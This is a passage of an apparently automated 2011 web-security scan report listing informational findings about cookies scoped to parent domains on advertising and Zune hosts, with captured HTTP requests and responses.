udm_0=MLv3NzENbgpj37xX1GlJO7a3wEU0cw3fRauBLbLa1hxIJOjDBlu18gnrOpSO3YjF0wMKV4ipvKrR3EogwrxHeNknjMH6SqUl22pXLAnFTV9qIeZlIZDHhyA0dnb6CwiAhxROt1YH8AVXH8382QGU/vgf98KjcLbIKBY60ENFOM7PSFI0WvHFebNnpD4olAZ8EKv0T8FyPx6DB7zblwlm/kfK0gsDM9HWwjjlpRArVpgdwu7hzWke/0YixMmmj5fRg6bBCx0SlvtbNmqCvsL9F+ThBet19A04HxTqU8b3nQhNZQGPBELixm9ZPLcb0nND8FSs5lEnuFkpXMu9XllQPRKily+32yrrvpvCQ5hdDDws3fRNKu9/VbXaqnftCbneHUzm69ZOZ0bU3GpkV37psEePMvYy5M9A1WMNQTLz3tsX5kfpLytLXUghOOqB/pQnGvlLrG3jR52bk5VGeRrE7ifz9y1n9uuhpUSHstnDVJAhckVdxAf0dhr+BzFueK6tJwy5o358GYKr4ry9mXUxrBhWdfeEgP0zm25Ih8ZAyh2cru1GAXaBOIKDNsQqAbhr4/x0AM3+BVLmPMMY12n3J+s4kc4awJtt7+FQgXo1NPLkMhjUdOAZcvjlggsTUMim918XskWnLFxgCEjyFn5gwnfpprqPLwri12NcuTcWLAKw8g0DdBvoeQgcr66oEHP6hTz2knqS5hfh0KTnj2uAkBw/WcyKvQ0K6mV+ujsqYMntEg3wHxat+ozLZkyYzVmCjTff6Yssgszk+Ln2nBOsMCNsu3grl8/mjf+JrnijOGn0fAJIpAgw5LSKbzNNFIEzolKLS9jsskM78jnojzRjl18iF6JsYngRg42f/OjDM/4XPdH/kiuKqMwT8neptYVN8gAeirQn83vTADE6vJdGN/m2j8Isv5DTBi+BvWFDALDwARgW2CrZCOjRaXOCH+mCDLkyaBfdswb3s8MQGf8OnLkXbgZxht6J0pymsopMR1/erCrDSKhaDjW3dbxj2Ec2ruEnAZ1K16NpPVlZAwGIQOKVna8Eph3bGwiPsyh0aVeLizRyS727aLulAX44yHYtN7pvQycigS4oAVgoexNRjIDXQytUbnNWFYeh1W4CDCtEi/GSzoQB+k1xV4aTQw6qbsH9WFgQsnQZ2p7dtgw1PcRM1q58YfPNexKh9bv3HYj68SoXzfuFseAwDbBWVFoQIV3np8KjOAy/XFT3w8wD3Uk2qoGAqY6jvE5IEg2CETzhFMgAby1SLgECONA+/NiEOpTsefwlKrp4QbyubMrUU8QqWcfpYLQmG7EEAZMaD61U30gLGpyTDz+XTK1Aetxz1XYZ7g1+7zdI+2Jz80HqzHAuVQrwbViu98spWaM0QPlKW5i8JhSI84NTuETOMs4sVoakoTsytqLu/NICBhVKXA9krf692p+28S/XtfL7pe+8ITPA3CXgdnZi3/sVFt5SczdpaBGG3fXkatl1cEkySH37s3Q5QzkvxK0JaT2hRSLjHvQq7V789ZV3A0rtyOhZFIU4m/biU0ASEvJJaC023+ugedPPFcdKly4XIbrT0vHawWP8xdGHsTFgGioYb1WZogmwmjaqZmwUg4TzO1mmsa6k7V+XnsdYiYLp1jN2z3CvCXdYQNY0GbpiIN0MYulPLdp0Qysc4z/0y9NO0uN8KHzT3mWvfthj1Naxji6UD7Fq59FA00aUdvRRrl9Ii2oMu/ZSC31YZhyTl8vy06iSMzRCHhgzGUXTrIr26/AOZ28M3xZjyQx4NbTI9+0/gv1qHeP0D+0GGfIi+c/Hnoj46u05Oz2rfd0IHItCcszLJpVkV7WgbA==; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tsfwP0KOUz16+gnQCV8thMJiG9y0/Ny8RycOj5Ee7W6976f+6q5uEkCljxs8/kkfUBkYkyv8Z6yN0Nd4WTv6nXi+wXts6Wq9fr6i0BVdAbUIt5q/AIu1tFMoLa+s5ybvovc1/sBiFagcmNZNEVOe/GUhqpvMMfBuED2AAtbTPmHja7LcOz4agTWi1koiKCTVv3qzk/79Qe2uPaQ6S7kAtoomuw/f8LKElRxy0cr+w2LkZjOKbucdRZZ24QaRgKaY1AMwZ8CSy1q4Bj7frnr33+NAZ28K2eqWTRzqHhiemYOPzFThvMc/LKh+lxjqccKlpfLelX3klLEP/sLoQ0P6lQ6cdNVQb3x2dZu7Uos9MOBqUHAZBkGUV3WmZ+rBDbbykBkJ5ScL50YNQGZrrt/HsYLSFJ1iQJDtX0BBMQEhE9Bm6B8KTU2B/+Tl9/z5z97+8PbD0lxNA1yRZRhLlb5N+vXpOlVXGaet4LJUbUUroApU+zR8PD394xJmJO9uIGq3nczsCCgrviDk+wlwWBJxAe13ViEqMDGFqe/XYaHMLv4FfqGe9RDrkTiBsaURaU2tBuJuF4kcSjipIKo96BoAvnIgAQ5aQ6FMjFLmtDIaStvMYiow+kEShGdJz3hz2UWdehqqamV60647IIuCZ+2HMgzX1GZgTEwazFHHp14F2bopoWcS2XxRiPNuV43PLbWFQQYi4x8RbB7WZm3LZ5eAPFGPKP4lN/t3r6q2cvFC5xKH/C339zgf6wBbxY94vTIz3EVEmF37yH7WQ2IlDvlP5iqu6GwMlroZWZrWzZMhKjhXtVtLXnZKSEns45kweQXxc2zCs3qojoqj2qFHg4a001Z3yDllrXDwJAabHr5Wgc8y0BK/ofvDL7XHaSeEoljUxm9KkuLGCjfF1XYBkwuTVBNiJq8RqvSzK64qnZNRty5Q3h+StSof0aki+YNsomLdXGPiZWX83jCDKbTjSbj+hizDjviNSkx95cRiMmuryNaSdO05sUVi0qRJJJ9SmIHgtrm1PNCY2hXEpu1dsy5NhOU+gzwUFDzEHOsk2pWeFPfriTzXqIi4lN39TQllYCaGXn3ezQvFSjSIkIQwrkm6gBJ7gnTgRD6A5cOwIfQk9fSDSkvblZRDLqroqhO7bgYjuN+LcdM7Ve/43ZMpUERWhIMXfXy1aRrqf0LRfLalQrCDEjP9qJjlsKLTUkEX48QSaBB30VpKn8uFiU71y39ztY0ldEI6fKW0WZsvLi8RNNHwzwryegZdQNPqY3GCxrbPQglNmlJ/0AOv7efwM/lfzF+7EddIkVoJVC7/CnqGwbss3ro70EGZ/mHLDffQxKNs69LCdqfNz2d2IN/jFjEJIGfyu9hj+Y6Lz7/Aoq345+vsZJOQhUFmcZDdEjolfrv25Qs8YHoKtsd9x5OzwOMNHipu490I83yu94a7iWqDHgrR1yr/uMAvscudgUa3pQaYfusrPhHFl7VKw3dNYub5VjRz/zdMjAI8H/NhNVSkBt7UhNNkE91CvD5ucCHrIOsYwCTJ/k4LgHZO+JlPvGagrFzQG+/cazoZiKfk+Ww3aKjqgESDiv6pV05xqMO1JCtyp++YSQ0Fjk/q8DmQ3I694az4HJyeF0doaYqdgDTaemIgsk09TF0P3eY8qsFTdBqwFsRImeaUnZysTD9OAL/JihvJz1KIY9BLAr9MXTPdigmKhIA+N9hzv9imoMFmleig5A5x4f13nj0feG7vc77b2lf+9Hm5HyLNCOJjtCy8n1SLMSrosCmjbfKBA2fP1sWx3WrLZIf0ePVlA==; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/
Last-Modified: Wed, 06 Jul 2011 14:00:43 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 06 Jul 2011 15:00:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:43 GMT
Content-Length: 5681

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9.19. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=msftie9drcpc_cs=1&betq=12682=433083 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=swDFOFJwCob0FNysICwJoakBtKvAC0nhXLpwIg02FAHCdbdBwhwihXAcIwjmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhAmhXAcIAY4FAHCdDmBwhAmoZAcIwtlGAHCEHoBwhwoyaAcIU1aGAHCBHoBwhgdeZAcIYZgGAHC1mpBwhgHXaAcI0soGAHCX8rBwhAG/aAcIYxvGAHCKopBwhQ2kXAcIUEoGAHCVGoBwhgh3ZAcRGQYmjohS0I9GsfzFU9shNwjkak1k6hA1WjBpD7gCw8jGp+tSLAr8ao60mvAz8qhr7qHGwyfGahh3iyKgW8q; GUID=MTMwOTk0ODk3MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 15:39:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 06 Jul 2011 16:39:03 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.21. https://live.zune.net/xweb/passport/rightCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.22. https://live.zune.net/xweb/passport/topCB.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://live.zune.net
Path:	/xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
